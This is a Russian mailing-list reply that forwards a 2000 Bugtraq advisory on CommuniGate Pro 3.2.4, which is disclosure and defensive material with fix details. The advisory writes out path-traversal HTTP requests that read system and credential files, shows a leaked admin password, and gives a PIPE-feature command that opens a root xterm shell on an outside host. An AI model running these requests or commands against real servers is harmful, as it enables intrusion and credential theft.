Re: Vulnerabilities in CommuniGate Pro v3.2.4

On Tue, 18 Jul 2000 11:35:44 +0400
 Boris Tyshkiewitch <bvt@zenon.net> wrote:
>
> Если у кого стоит 3.2.4, то срочно удалите/переименуйте директорию
> Guide.

WebGuide.

3.2 affected too.

>
> Boris.
>
>
> ----------------
> This is a forwarded message
> From: Lluis Mora <llmora@S21SEC.COM>
> To: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM>
> Date: Tuesday, July 18, 2000, 1:09:41 AM
> Subject: S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
>
> ===8<==============Original message text===============
>
> ###############################################################
> ID: S21SEC-003-en
> Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
> Date: 03/04/2000
> Status: Vendor contacted
> Scope: Remote command execution as superuser
> Platforms: Linux, probably others
> Author: llmora, fjserna
> Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt
> Release: Public
> ###############################################################
>
> S 2 1 S E C
>
> http://www.s21sec.com
>
> Vulnerabilities in Stalker's CommuniGate Pro v3.2.4
>
>
> About CommuniGate Pro
> ---------------------
>
> CommuniGate Pro is a feature-full commercial mail server
> (http://www.stalker.com/CommuniGatePro/).
>
> It does SMTP message routing, provides POP, IMAP and HTTP access to
> mail,
> etc.
>
> The CommuniGate Pro mail server has a built-in web server that allows
> users to read and send e-mail through the web, as well as allowing
> the
> administrator to remotely manage the mail server settings.
>
> By default it opens port 8100/tcp for web users access to mail and
> port
> 8010/tcp for web management access.
>
> Vulnerability description
> -------------------------
>
> 1. Reading any file in the mail server
>
> CommuniGate provides a useful mapping to access the Web User Guide,
> which
> maps the URL /Guide/ to a directory in the CommuniGate sub tree. The
> built-in web server suffers of the well-known "../.." web server
> problem.
> If we request a document from the administrative web server /Guide/
> mapping,
> using the "../.." technique, we get to see the file contents:
>
> homer:~$ telnet ilf 8010
> Escape character is '^]'.
> GET /Guide/../../../../../../../../../../../../../../../etc/motd
> HTTP/1.0
>
> HTTP/1.0 200 OK
> [... the /etc/motd file content is shown]
>
> Connection closed by foreign host.
> homer:~$
>
> As CommuniGate runs as root and it doesn't drop any privileges, we
> are
> able to access any file in the system, e.g. /etc/shadow, ...
>
> E.g., we can retrieve the postmaster/manager settings file, which
> includes the plaintext password to access the management website:
>
> homer:~$ telnet ilf 8010
> Escape character is '^]'.
> GET
> /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.
> macnt/account.settings HTTP/1.0
>
> HTTP/1.0 200 OK
> Content-Length: 61
> Date: Mon, 03 Apr 2000 09:17:35 GMT
> Content-Type: application/octet-stream
> Server: CommuniGatePro/3.2.4
> Expires: Tue, 04 Apr 2000 09:17:35 GMT
>
> { ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
> Connection closed by foreign host.
> homer:~$
>
> 2. Remote execution of arbitrary commands as root
>
> This is not a vulnerability in itself but a demonstration of what can
> be
> accomplished once an attacker has obtained the postmaster password.
>
> Looking up the features of CommuniGate, we find the PIPE feature. It
> allows people to send e-mail to a program in the mail server. It's
> disabled by default, but once we can access the mail server settings
> using
> the postmaster password, we can just enable it, make the application
> directory be /usr/X11R6/bin/, increase the max. process execution
> time,
> and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe
> which will open a root xterm in our desktop...
>
> Affected versions and platforms
> -------------------------------
>
> This bug has been tested on the Linux (non-redhat & redhat) v3.2.4
> (the
> latest stable release) distribution found at www.stalker.com. It has
> not
> been tested with other platforms or previous versions, though we
> strongly
> believe the bug is platform independent, and can probably be found
> and
> reproduced in previous releases.
>
> Current beta versions (as from v3.3b2) don't suffer from this
> security
> problem.
>
> Fix information
> ---------------
>
> There is an upcoming stable release (v3.3) that will fix this
> problem,
> and currently the v3.3 betas (v3.3b2 or newer) are patched against
> this
> attack.
>
> Upgrades are available from the vendor website at
> http://www.stalker.com.
>
> Additional information
> ----------------------
>
> This vulnerability was found and researched by:
>
> Lluis Mora llmora@s21sec.com
> Fermin J. Serna fjserna@s21sec.com
>
> You can find the latest version of this advisory at:
>
> http://www.s21sec.com/en/avisos/s21sec-003-en.txt
>
> And other S21SEC advisories at http://www.s21sec.com/en/avisos/
>
>
> ===8<===========End of original message text===========
>
>
> ##################################################################
> Вы получили это сообщение потому, что подписаны на список рассылки
> <CGatePro@mx.ru>.
>
> Чтобы отписаться, отправьте сообщение на адрес <CGatePro-off@mx.ru>
> Чтобы переключиться в режим дайджеста -
> mailto:<CGatePro-digest@mx.ru>
> Чтобы переключиться в индексный режим - mailto:<CGatePro-index@mx.ru>
> Для административных запросов адрес <CGatePro-request@mx.ru>
>
>
>

-- 
Игорь Винокуров

##################################################################
Вы получили это сообщение потому, что подписаны на список рассылки
  <CGatePro@mx.ru>.

Чтобы отписаться, отправьте сообщение на адрес <CGatePro-off@mx.ru>
Чтобы переключиться в режим дайджеста - mailto:<CGatePro-digest@mx.ru>
Чтобы переключиться в индексный режим - mailto:<CGatePro-index@mx.ru>
Для административных запросов адрес <CGatePro-request@mx.ru>